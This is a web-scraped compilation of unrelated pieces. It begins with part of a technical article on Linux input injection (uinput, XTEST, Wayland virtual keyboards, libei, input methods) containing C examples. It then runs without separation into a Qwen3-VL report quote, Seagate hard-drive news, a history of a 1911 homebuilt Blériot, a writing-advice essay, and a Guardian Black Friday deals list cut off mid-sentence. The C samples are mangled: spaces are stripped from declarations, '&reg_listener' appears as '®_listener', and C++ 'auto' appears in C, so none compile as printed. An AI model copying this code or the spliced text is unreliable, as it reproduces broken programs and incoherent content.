#include<libevdev/libevdev.h>
#include<libevdev/libevdev-uinput.h>
#include<unistd.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>intmain(void){structlibevdev*dev=NULL;structlibevdev_uinput*uidev=NULL;interr;/* Allocate and configure the virtual device */dev=libevdev_new();if(!dev){fprintf(stderr,"Failed to allocate libevdev device\n");return1;}libevdev_set_name(dev,"Example device (libevdev uinput)");libevdev_set_id_bustype(dev,BUS_USB);libevdev_set_id_vendor(dev,0x1234);libevdev_set_id_product(dev,0x5678);/* Enable only one key: KEY_SPACE */libevdev_enable_event_type(dev,EV_KEY);libevdev_enable_event_code(dev,EV_KEY,KEY_SPACE,NULL);/* Create the uinput device */err=libevdev_uinput_create_from_device(dev,LIBEVDEV_UINPUT_OPEN_MANAGED,&uidev);if(err!=0){fprintf(stderr,"Failed to create uinput device: %s\n",strerror(-err));return1;}/* A pause to allow the system (udev etc.) to register the device */sleep(100);/* Emit a space key press */libevdev_uinput_write_event(uidev,EV_KEY,KEY_SPACE,1);libevdev_uinput_write_event(uidev,EV_SYN,SYN_REPORT,0);/* Emit the key release */libevdev_uinput_write_event(uidev,EV_KEY,KEY_SPACE,0);libevdev_uinput_write_event(uidev,EV_SYN,SYN_REPORT,0);/* Let user-space read the events before destruction (optional) */sleep(200);libevdev_uinput_destroy(uidev);libevdev_free(dev);return0;}
The disadvantage of uhid and uinput is that, since they interface with
the kernel, they require root privilege and relying on HID or evdev might
not be practical for the average day-to-day usage. For example, if we
want to output a symbol, let’s say ‘p’, we have to know its keycode, and
for that we need to know the keymapping, which in turn requires XKB or
others. Thus, we’re back to square one and re-creating the upper input
stack from scratch.
What if we could directly say “send this keycode or keysym, it’s from this
virtual device”, without even needing extra permission if we’re already in
a desktop environment. Well, that’s exactly what the X11 XTEST extension
does, and what some Wayland extensions and mechanisms achieve too.
Remember when we used xinput to list some devices and some virtual ones
were listed:
These were created by the XTest extension which was written to support
automated testing of X server. These days this can be used for remote
desktop, task automation, password managers (autofill), and others. When
clients interface through this extension they directly inject keyboard
and mouse events into the X server, bypassing the whole input stack,
and these events are propagated afterward to the X clients.
Let’s see a simple programming example relying on
XTEST(3)
that will
send the keysym “a”:
That’s clean and easy, now on Wayland the picture is a bit more complex
since the protocol doesn’t allow clients to randomly generate input
events. It was designed this way for security reasons.
As with anything Wayland, there are a few unstable extensions,
though deprecated now, such as
zwlr_virtual_pointer_v1
and
zwp_virtual_keyboard_manager_v1
, mostly wlroots Wayland extensions.
An example of the
zwp_virtual_keyboard_manager_v1
extension would look
somewhat like this:
#define _POSIX_C_SOURCE 200809L
#include<wayland-client.h>
#include"virtual-keyboard-unstable-v1-client-protocol.h"staticstructzwp_virtual_keyboard_v1*vk;staticvoidglobal_add(void*data,structwl_registry*reg,uint32_tname,constchar*iface,uint32_tver){if(strcmp(iface,zwp_virtual_keyboard_manager_v1_interface.name)==0){auto*mgr=wl_registry_bind(reg,name,&zwp_virtual_keyboard_manager_v1_interface,1);// NULL seat → compositor chooses default seatvk=zwp_virtual_keyboard_manager_v1_create_virtual_keyboard(mgr,NULL);}}staticconststructwl_registry_listenerreg_listener={.global=global_add,.global_remove=NULL};intmain(){structwl_display*d=wl_display_connect(NULL);structwl_registry*reg=wl_display_get_registry(d);wl_registry_add_listener(reg,®_listener,NULL);wl_display_roundtrip(d);// wait until vk is readyuint32_tkeycode=30;// Linux evdev (KEY_A)uint32_tstate_pressed=1;uint32_tstate_released=0;zwp_virtual_keyboard_v1_key(vk,0,keycode,state_pressed);zwp_virtual_keyboard_v1_key(vk,0,keycode,state_released);wl_display_flush(d);return0;}
But for a better example check the source of
wlrctl
that also relies on the
zwp_virtual_keyboard_manager_v1
extension.
Yet, these days, this isn’t the path that Wayland has taken, and none of
the compositors agree on these extensions, instead they rely on libei,
a library to consolidate Emulated Input. This is its architecture:
It has two pieces: a client side that creates virtual devices and
generates evdev events, and the server side called EIS that lives within
the compositor (but that isn’t limited to Wayland) and is responsible for
giving a file descriptor to the client to interface with, and dispatching
received events to where they need to go. The dispatching could be through
uinput devices, that’s an implementation detail, yet most compositors
just store it as an internal virtual device.
This allows compositor to be aware of who is currently emulating input,
which capabilities they require (keyboard, touch, pointer), and to
restrict and/or suspend devices at any time.
Optionally, the compositor may delegate the file descriptor mechanism to
a xdg-desktop-portal dbus service implemented by the desktop environment
so that it can check with polkit and others the allowed permissions
(
see
). So it would
look like this:
An example implementation of a client can be found
here
.
Or mixed with an XKB mess to translate from keysym to keycode, for the
pleasure of your eyes:
#include<ei.h>
#include<xkbcommon/xkbcommon.h>
#include<string.h>intmain(){// ----------------------------// 1. Create an XKB context// ----------------------------structxkb_context*ctx=xkb_context_new(XKB_CONTEXT_NO_FLAGS);// load the default system keymap (XKB rules, model, layout, variant, options)structxkb_keymap*keymap=xkb_keymap_new_from_names(ctx,NULL,XKB_KEYMAP_COMPILE_NO_FLAGS);if(!keymap){fprintf(stderr,"failed to load xkb keymap\n");return1;}// ----------------------------// 2. Convert keysym → evdev code but only for group 1 and level 1// ----------------------------xkb_keysym_tsym=xkb_keysym_from_name("a",XKB_KEYSYM_NO_FLAGS);// if we know the key by name it would be much easier// xkb_keycode_t code = xkb_keymap_key_by_name(keymap, "AD01"); // But better: find the keycode for the keysymxkb_keycode_tkey=0;// Iterate keycodes until we find the one producing this keysym// That's because keycodes->keysym is many-to-onexkb_keycode_tmin=xkb_keymap_min_keycode(keymap);xkb_keycode_tmax=xkb_keymap_max_keycode(keymap);for(xkb_keycode_tk=min;k<=max;k++){if(xkb_keymap_key_get_level(keymap,k,0,0)>=0){intnsyms;constxkb_keysym_t*syms=xkb_keymap_key_get_syms_by_level(keymap,k,0,0,&nsyms);for(inti=0;i<nsyms;i++){if(syms[i]==sym){key=k;break;}}}}if(!key){fprintf(stderr,"could not map keysym\n");return1;}// IMPORTANT: xkbcommon keycodes are **+8** relative to evdevintevdev_code=key-8;structei*ei=ei_new();// compositor socket, we'd need to get it through portal in real scenarioei_connect(ei,"unix:path=/run/user/1000/ei_socket");structei_client*client=ei_get_client(ei);ei_client_set_name(client,"xkb-sender");structei_device*dev=ei_device_new(client,"xkd-virt-keyboard0");ei_device_add_capability(dev,EI_DEVICE_CAP_KEYBOARD);ei_device_start_emulating(dev);// press and releaseei_key(dev,evdev_code,true);ei_key(dev,evdev_code,false);ei_flush(ei);ei_disconnect(ei);ei_free(ei);return0;}
Then obviously the EIS side has to catch these events and handle
them. There’s also an example that creates uinput devices found
here
.
The main logic of an EIS is quite straight forward (from the official docs):
create a context with
eis_new()
set up a backend with
eis_setup_backend_fd()
or
eis_setup_backend_socket()
register the
eis_get_fd()
with its own event loop
call
eis_dispatch()
whenever the fd triggers
call
eis_get_event()
and process incoming events
And whenever a new client connects:
accept new clients with
eis_client_connect()
create one or more seats for the client with
eis_client_new_seat()
wait for
EIS_EVENT_SEAT_BIND
and then
create one or more devices with the bound capabilities, see
eis_seat_new_device()
That’s kind of like network programming.
So far, most Wayland compositors implement this mechanism
along with portals. You can see the list of support
here
, from
GNOME, KDE, XWayland, and more.
On that note, XWayland is both an X server, and a Wayland client. So it
understands XTest requests. Yet what happens when it receives them is
that internally it relies on libei client side to handle virtual device
events. That means xdotool can work on XWayland with libei context.
An X11 client sends a key event using XTEST (normal)
XWayland receives it and initiates Remote Desktop XDG Portal session to … your own system (???)
XDG Portal uses DBus in an odd way, with many method calls receiving responses via signals because DBus isn’t designed for long asynchronous methods.
Once the Remote Desktop portal session is setup, Xwayland asks for a file descriptor to talk an libei server (emulated input server).
After that, libei is used to send events, query the keyboard map, etc.
You can ask libei for the keyboard mapping (keycodes to keysyms, etc), you get another file descriptor and process that with yet another library, libxkbcommon.
The main issue is that if the libei client gets its file descriptor
via dbus portal, then every time it asks for it then the user will get
prompted to “Allow remote interaction?”. And most portal software don’t
have config or whitelist rule mechanisms to skip that (as far as I know),
which would make sense while keeping the same security level.
When it comes to remote desktop on Wayland, it’s quite similar, it
relies on the same libei mechanism. Yet, we need to add to the equation,
as far as input goes, a listener that captures input regardless of the
focused window.
The remote desktop is also achieved with libei and a dbus xdg-desktop-portal
either
org.freedesktop.portal.RemoteDesktop
or
.InputCapture
, which will give back to the client
a special file descriptor for listening to the input stream.
And similarly, it is always explicit about asking for
permission to share input or share the screen (or specific
window/surface), and there doesn’t seem to be a general
configuration to turn it off or whitelist certain clients (
see
discussion
).
Let’s note that in the case of Wayland it is the compositor that usually
provides VNC/RDP servers, for example KWin and GNOME Mutter (apart from
wayvnc
for wlroots compositors).
Meanwhile, on X11 the remote desktop protocol was part of the X11 protocol
itself from the start, with full access, the whole events. The X server
can be on another machine and clients can communicate with it over the X11
protocol, or the events could be forwarded over ssh and others. VNC and
other remote desktop protocol can rely on how open it is too. Plus, XTEST is
there for injecting events too. There’s no limitation for apps to read the
screen framebuffer either, send it, and draw it in another X session,
but it’s often re-rendered when doing remote desktop. (x11vnc, TigerVNC,
etc..). There have been extensions over the years for security (XACE)
but nobody is relying on them.
There’s also xrdp, but this creates a whole new virtual Xorg session,
so it’s another story.
Let’s now review a couple of tools used for automation.
We’ve already seen quite a lot of the ones that rely on evdev and uinput,
but now they will make more sense with our current context:
evmux
and
inputattach
- multiplex multiple evdev devices into a
single virtual stream
The most popular tool that relies on XTEST (plus EWMH and others) is
xdotool
.
NB
: the “toplevel-management” Wayland “unstable” extension somewhat
replaces some of the EWMH, but it’s not implemented by most compositor
for security reasons.
Similar tools to
xdotool
but that relies on uinput are
ydotool
and
dotool
.
We’ve seen
wlrctl
that relies on the unstable wayland protocol for
wlroots-based compositors. There’s also
wtype
that also relies on the
unstable virtual keyboard protocol.
We can also possibly perform automation via very specific desktop
environment mechanisms. That means using something such as GNOME shell
extensions for example, which has a javascript API. KDE has that
concept and the utility
kdotool
relies on this.
As you’ve observed, the situation is a bit fragmented on Wayland when
it comes to automations, both in utilities and extensions.
Input Method
In this last section we’ll explore the concept of input method (IMF &
IME), a mechanism to input keysym/characters that are not natively
available on the user’s input device. This is necessary for languages
that have more graphemes than there are keys on the keyboard.
There are two sides to the equation: the IMF, the input method framework,
and the IME, the input method engine which works within the framework. An
input method framework’s role is to pick the most appropriate way
to enter the text, shape it, and return it to the widget. The IME is
basically the place where input are interpreted in any way shape, form,
or logic, to produce the text that the IMF asked for.
The IMF can also act as wrapper over XKB configs, to allow easily swapping
between keyboard layouts, it coexist with the idea of switching between
different IMEs.
Simply said, the IME is a middleman between the keyboard and the actual
output text when relying on the toolkit/widget.
The way the input method plugs into the whole input stack is at the window
client side, within the widget/toolkit library framework in the input
handling event loop. After the client performs the keycode to keysym
translation and composing, it calls the toolkit specifically configured
input method, which will reroute it to the IM pipeline. Within the
pipeline, the IMF implementation will talk over its protocol to have
the IME interpret the input, and return preedit and committed text. This
will in turn be pushed back to the toolkit to display.
That means that simply by relying on input widgets from a framework
such as GTK or Qt, it will automatically handle the integration with the
Input Method.
Some of these input frameworks are swappable, either because they talk
over the same protocol, be it the old deprecated XIM protocol for legacy
purpose (X Input Method over X protocol extension), or because they
plug straight as a module into the widget framework, which is mostly that
case today.
There are a lot of IMFs and IMEs implementations, and interoperability,
see this list
.
These days the two major IMFs are IBus (Intelligent Input Bus, GTK-based like GNOME), and Fcitx5
(Qt-based like KDE).
To swap between them, if they are compatible with the toolkit, one can
set certain environment variables related to their toolkit:
For example the path that the text will take with Ibus looks like this:
Application → GTK/Qt IM module → D-Bus → IBus/Fcitx
→ IME → D-Bus → GTK/Qt widget
As you can see, this bypasses all graphic servers, be it the X servers
or Wayland compositors.
Yet for it to work across the Wayland ecosystem, and not only on some
widgets like GTK and Qt (games, electron apps, java apps, sandboxed apps,
etc..), the IMF/IME stack needs to be able to listen to key events from
any application, provided it is focused, get the surrounding context,
take field focus, and inject text into clients. This is why some
“unstable” extensions were created, mostly “text-input-unstable-v3”
(
zwp_text_input_v3
) and “input-method-v2” (
zwp_input_methd_v2
)
protocol. With this, there’ll be consistent IM behavior across all
applications without compromising security.
On a side note, this same extension protocol for injecting text can be
used for the speech-to-text accessibility framework. In practice this
can either be done via a virtual input device, or a specific desktop
service mechanism integrated in the toolkits. We have a desktop service
catching voice input, a standalone voice recognizer to convert it to
text, and a virtual keyboard or feature to inject events. For example,
GNOME VoiceInput, Plasma Whisper Integration, QtSpeech, SpeechDispatcher,
Caribou, Onboard, or GNOME Accessibility Services (AT-SPI). We won’t
go into details on that, nor mention text-to-speech, since it’s outside
our scope.
One issue remains though, and it’s related to the key repeat rate
and delay, which on Wayland is implemented client-side. It’s
not implemented by IMs, and tough to handle apparently (
see
).
And that it!
Conclusion
Congratulations for making it this far into the article!
We’ve covered a lot of ground, literally from hardware to the very
abstract components of the graphical input stack.
I have some hope that in the future there’s going to be a more common
way to configure the Wayland input stack across compositors and have
fewer discrepancies and fragmentation. I also wish the XKB stack would
one day get cleanup up, but on this one my hopes are pretty low. It’s
fallen victim to entropy and chaos.
A huge gigantic thanks to “who-t” aka Peter Hutterer, whose
blog
has
been my trusty companion for the past months.
We need more articles like this in the age of AI overlords, so please
share it if you’ve enjoyed it!
Thanks for reading, have a wonderful end of day!
NB: This article compiles my understand, for any correction please
contact me.
If you want to have a more in depth discussion I'm always available by
email or irc
.
We can discuss and argue about what you like and dislike, about new ideas to consider, opinions, etc..
If you don't feel like "having a discussion" or are intimidated by emails
then you can simply say something small in the comment sections below
and/or share it with your friends.
Quoting Qwen3-VL Technical Report
Simon Willison
simonwillison.net
2025-11-27 17:01:11
To evaluate the model’s capability in processing long-context inputs, we construct a video “Needle-in-
a-Haystack” evaluation on Qwen3-VL-235B-A22B-Instruct. In this task, a semantically salient “needle”
frame—containing critical visual evidence—is inserted at varying temporal positions within a lon...
To evaluate the model’s capability in processing long-context inputs, we construct a video “Needle-in-
a-Haystack” evaluation on Qwen3-VL-235B-A22B-Instruct. In this task, a semantically salient “needle”
frame—containing critical visual evidence—is inserted at varying temporal positions within a long video.
The model is then tasked with accurately locating the target frame from the long video and answering the
corresponding question. [...]
As shown in Figure 3, the model achieves a perfect 100% accuracy on videos up to 30 minutes in
duration—corresponding to a context length of 256K tokens. Remarkably, even when extrapolating to
sequences of up to 1M tokens (approximately 2 hours of video) via YaRN-based positional extension,
the model retains a high accuracy of 99.5%.
Hard drives remain a vital component in building high-capacity storage solutions, especially in the data center. IT Home
reports
that
Seagate
is continuing to break barriers on how many TBs can be stored on a single hard drive and has achieved a whopping 6.9TB per platter in its laboratory, making 55TB to 69TB hard drives a possibility for the first time.
Seagate's experimental 6.9TB platter boasts more than double the capacity of platters it uses in official products right now. Outgoing models such as Seagate's 30TB HAMR HDDs use 10 3TB platters to reach maximum capacity. With 6.9TB platters, Seagate will be able to build drives with more than double the capacity of its outgoing drives in the same form factor.
(Image credit: Seagate)
Seagate is leveraging its heat-assisted magnetic recording (HAMR) technology to deliver its 6.9TB platter. If you want to check out how Seagate's HAMR technology works, check out our
previous coverage
. In a nutshell, HAMR uses heat-induced magnetic coercivity to write to a hard drive platter. In Seagate's outgoing drives, this tech is combined with Mozaic 3+ to reduce the media grain size compared to typical HDD platters.
However, these 6.9TB platters are still in development and are not planned to be used for another 5 years. Seagate's roadmap reveals that 6.9TB platters won't be used in official products until 2030. In the meantime, Seagate is working on developing 4TB, 5TB, and 6TB platters that will enter production in 2027, 2028, and 2029, respectively. But the company won't be stopping there; it projects that it will have 7TB to 15TB platters available from 2031 onward. Assuming nothing changes, Seagate could likely have petabyte-sized hard drives before 2040.
Seagate's continuous improvements in hard drive capacity will be vital to keeping up with the increasing demand for hard drives. Despite the rise in SSD maturity, hard drives are still the backbone of the world's long-term storage, thanks to better
reliability
and far superior storage capacity per drive (for the most part) and storage capacity per dollar. Hard drive reliability has only improved as the AI boom gobbles up hard drive orders, leaving HDD manufacturers with
2-year backorders on hard drives
alone.
Luckily, this problem has mostly been regulated to datacenter drives (for now). If you are looking to pick up a new hard drive right now, be sure to check out our best
Black Friday HDD deals for 2025
, which include a 24TB Seagate BarraCuda discounted to just $239.99 (at the time of writing).
Fabricated by teenage brothers in 1911, this unique homebuilt is once again airworthy.
Despite its shortcomings, the Blériot XI was one of the great designs of aviation’s early years. The successful fruit of numerous prior attempts—and failures—by French pioneer aviator Louis Blériot, it was tricky and even dangerous to fly, largely because its horizontal stabilizer had an airfoil like the wing, which could cause the nose to suddenly pitch down during high-speed dives. When Blériot piloted the shoulder-winged monoplane on a historic 23½-mile hop across the English Channel in July 1909, however, he won his design a worldwide stamp of approval beyond its inherent merits. From then on, aviators out to score more firsts in distance, speed, altitude or endurance, or simply out to experience the thrill of early flight for its own sake, wanted a Blériot XI. Besides the examples Blériot produced, a number of other companies on either side of the Atlantic manufactured it under license, while other budding fliers built their own planes based on its basic layout. It was in that last category that the VanDersarl brothers staked their modest claim to fame.
Little is now known about Jules “J.J.” VanDersarl and his younger brother, Frank, except that they lived just outside Denver, Colo.; their mother worked as a housekeeper; and they barely made it through grade school. But both brothers proved to have innate mechanical talents that made them proficient at machining, carpentry and other skills. Given that, it’s not surprising these young men, like a good many others at the time, became enthralled with aviation. J.J. experimented with gliders at age 12, and later, a few months after Blériot’s 1909 Channel flight, he and Frank got more ambitious. Obtaining all the publications and photographs they could, they used those references to build their own Blériot XI in 1911…then learned to fly it.
According to Javier Arango, director of The Aeroplane Collection in Paso Robles, Calif., who now owns the VanDersarl Blériot, the brothers “must have had some guidance and lots of information,” because the dimensions of their airplane are close to those of the original. Their homebuilt differs from the standard Blériot XI in three respects, however. First and foremost, instead of the 25-hp Anzani 3-cylinder radial or Gnome rotary engine that normally powered Blériots, the VanDersarls, using their general knowledge and machining skills, adapted a 4-cylinder inline air-cooled automobile engine with a reworked oil system to aerial use. Just what that engine was remains uncertain, though Arango said it was “close in dimensions” to the power plant used in the Metz, a car equipped with a liquid-cooled engine that the company had planned to adapt to aviation but which never quite materialized.
A second difference, Arango noted, was that “some of the structure around the empennage is placed slightly differently than in most Blériots.” Finally, he said, “The French Blériots were built to a high quality, but our plane was built by teen agers in Colorado who just wanted to go fly—it’s a little rougher than pristine Blériots.”
Even so, the handmade airplane worked remarkably well. “There is a photo of the first flight, which ended up in a landing that broke the landing gear,” Arango reported. “But it was repaired and flew again. Both brothers flew it.”
The VanDersarls went on to fly Curtiss JN-4 Jennys and Standards, and in the 1920s, Arango said, “Frank started an airport and barnstorming operation.” The most remarkable thing, though, is that Frank kept the homebuilt in which he and J.J. had first learned how to fly. “I’m so glad they kept it,” Arango remarked. “This breed of airplane is quite rare. The Smithsonian Institution has only one such aircraft.”
In the 1960s Frank VanDersarl tried to restore the Blériot, but he died before completing the project. After J.J. VanDersarl died in Raton, N.M., in November 1977, the monoplane was exhibited at the Museum of New Mexico. In 1994 it was bought by Joseph Gertler, who loaned it to Dowling College in Bayport, N.Y. There it was further restored by John Zale, Frankie Mineo, Russ Moore and the Bayport Aerodrome Society. Then in 2009 Arango’s C.C. Air Corporation purchased it and added it to The Aeroplane Collection, with the ultimate goal of making it airworthy for the first time in a century.
“When we got it the plane was minimally restored,” Arango explained. “It was extremely authentic.” That meant it served as a useful reference toward the inevitable replacement of deteriorated material and components. “Chuck Wentworth from Antique Aero, who is really the main character in the restoration project, inspected it and went through everything,” he said. “The entire fuselage was in good shape. There were busted wires and turnbuckles that had to be reproduced and replaced to get it back to original condition. Chuck had to find parts of 1911 vintage to get the correct look, based on plans and photos. For example, they’d stuck a fake control wheel in the cockpit for display. We took all of that out.
“The wings were difficult—they were not the same age as the fuselage. They were probably damaged and were repaired or rebuilt by the VanDersarls. It took a lot of work with the wings to make them airworthy. The cotton covering was difficult to work with, and we even had to find the ‘honey-colored coating’ the VanDersarls described. We used a varnish that was tinted to get the correct honey color.”
Though he considered obtaining an Anzani engine, Arango decided to heed the advice of the National Air and Space Museum and “keep it as it was” by reconstructing the original engine. Fortunately for the restoration team, the VanDersarls “left good data on the cylinders, the copper cooling fins—all the specifications we needed to build the engine from scratch. The engine was put together with help from period publications and photos of the original.” The most difficult part was getting period components, but they managed to obtain a 1905 Bosch magneto, a brass carburetor of 1909 vintage, a tachometer, a magneto switch and a 1910 automobile oil gauge. In 2011 Wentworth unveiled the Blériot at the National Aviation Heritage Invitational in Reno, Nev. There on September 18 it won the event’s top award, the RollsRoyce Aviation Heritage Trophy.
Once the four-year project was completed, Arango and his team went through a systematic process toward getting it approved for flight by the Federal Aviation Administration. This presented some challenges, Arango said, since the Blériot XI predated the Civil Aeronautics Administration, let alone the FAA, and “there is no certificate and no paperwork of the age to make it current.” After the FAA inspected the aircraft, however, it finally registered the VanDersarl Blériot as an experimental airplane on August 16, 2012. This meant it could be flown under certain restrictions, such as not carrying a passenger for hire and with limits on the number of flights and travel radius around the airfield. “That was fine by us,” said Arango, “because we were happy to just fly, more or less in a straight line.”
Even with FAA approval, the VanDersarl Blériot underwent testing, reinspection and taxiing trials before it finally got airborne for the first time in more than a century on November 3, 2012. Since then, Arango keeps its flight itinerary at Paso Robles under tight self-imposed restrictions. “It’s a marginal airplane,” he explained, “with a 50-hp engine and very cambered wings that cause a lot of drag. It’s a good-flying airplane, but I’m not going to risk the airframe. It’s one of a kind, touched twice by its creators, and once by Chuck. I wanted it authentic to its own type.”
Originally published in the March 2014 issue of
Aviation History
. To subscribe, click
here
.
Have you ever noticed how
just
before sharing your work, you suddenly spot all its flaws? This isn't just a coincidence or bad luck. It's your social brain kicking into gear.
When making something with others in mind, you activate the parts of your brain wired for social interaction. This social brain is disproportionately powerful – it's the same neural machinery that makes us instinctively notice faces in a crowd or prioritize human voices over background noise.
Think of it like lifting with your legs instead of your back. Your legs are designed for carrying heavy loads safely and efficiently, while your back is more vulnerable and prone to injury when misused. Similarly, your social brain is optimized for clear communication and spotting problems, while your solitary thinking is more susceptible to blind spots and lazy reasoning.
Here are some ways you can deliberately trigger this superpower:
Imagine a specific person.
What questions would they have? What background knowledge are they missing? What would they disagree with?
Speak your ideas aloud.
The act of verbalization forces clarity in a way silent thinking doesn't. It can also help you spot overly complicated ways of saying something.
Share drafts with friends.
Even just the
anticipation
of real feedback sharpens your thinking.
Turning on your social brain can also help with Writer's Block. When I'm staring at a blank page, I try to imagine explaining my half-formed idea to a curious friend. Suddenly, I "hear" their natural follow-up questions, guiding my next steps.
Important caveat: Relying too heavily on your social brain can lead to people-pleasing and safe, boring work. You might avoid real creative risks if you rely on it too much. The sweet spot is using your social brain as a clarity tool, not as the ultimate judge of what's worth creating. Use it to sharpen the ideas you care about, not to replace them with what you think others want to hear.
Next time you're struggling with a project—whether it's writing, designing, coding, or something else entirely—try shifting your perspective. Instead of wrestling with your ideas alone, lean on the strength of your social brain. Your thoughts become sharper, logical gaps become obvious, and unnecessary complications fall away. It's not a panacea, but it can be a helpful tool.
Your social brain isn't just for socializing; it can also be a powerful intellectual tool. All you need to do is remember to switch it on!
The best Black Friday 2025 deals in the UK on the products we love, from electric blankets to sunrise alarms
Guardian
www.theguardian.com
2025-11-27 16:23:15
We’ve cut through the noise to find genuinely good Black Friday discounts on Filter tried-and-tested products across home, tech, beauty and toys • How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuleti...
L
ike Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuletide now seems to start roughly whezn Strictly does, and Black Friday seemed to kick off around Halloween. But now, at last, we’ve reached the day that puts the “Friday” into Black Friday.
Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on. Some of the Filter’s favourite items spent most of November floating around at prices clearly designed to make them sell out fast. Other deals have been kept back until now, and some won’t even land until the daftly named Cyber Monday (1 December).
As ever, we’d encourage you not to buy anything unless you really need it and have the budget to do so – read our advice on
how to shop smartly
.
Here’s our fully updated guide to the best genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.
The key to
shopping smart
on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.
Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.
We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as
the Camelizer
to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.
Q&A
How is the Filter covering Black Friday?
Show
At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.
Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.
We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.
The best
Black Friday deals on the Filter’s favourite products
The best home and mattress deals
The best artificial Christmas tree
Habitat 6ft mixed top upswept Christmas tree, £84 (was £120)
Habitat’s gloriously lifelike and easy-to-assemble tree topped our test to find the
best artificial Christmas trees
, and as December rattles towards us it’s inevitably discounted for Black Friday. The code XMAS30 will get you 30% (£36) off.
Heated fleece throw
Silentnight luxury heated throw, from £36 (was £45)
One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our
best heated throws
roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.
Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite
baby products
when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.
The best combination steam cleaner
Vax Steam Fresh Total Home mop, from £84 (was £160)
Emerging from Stuart Andrews’
best steam cleaners
test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.
Smart wake-up and reading light
Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)
When testing products for his guide to the
best sunrise alarm clocks
, our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.
A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our
heated airers
test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the
airer with cover
to £195.98 for Black Friday.
The best hybrid mattress
Photograph: Jane Hoskyn/The Guardian
Otty Original Hybrid double, £
533.58with code THEFILTER7 (was £647.99)
The most comfortable and supportive foam-and-springs hybrid of all the
mattresses
we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our
Otty Original Hybrid review
(spoiler: it gets five stars).
One of your favourite Filter recommendations of the year, this gentle
sunrise alarm clock
will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.
Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent
Simba Hybrid Pro
, another of our
best mattresses
, is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).
Wool mattress topper
Woolroom Deluxe wool topper (double), from £
148.74 (was £174.99)
The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe
mattress topper
adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% isn’t quite as big a discount as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.
Powerful pressure washer
Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)
Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the
pressure washers
he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.
A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the
best cordless vacuum cleaners
– and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.
You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the
best robot vacuums
, and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.
Damp-destroying dehumidifier
ProBreeze dehumidifier, from £151.99 (was £189.99)
This “workhorse”, which “extracted moisture powerfully” in our
best dehumidifiers
test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.
Microchip cat flap
SureFlap microchip cat flap, from £55.99 (was £61.99)
Let your cat (and
only
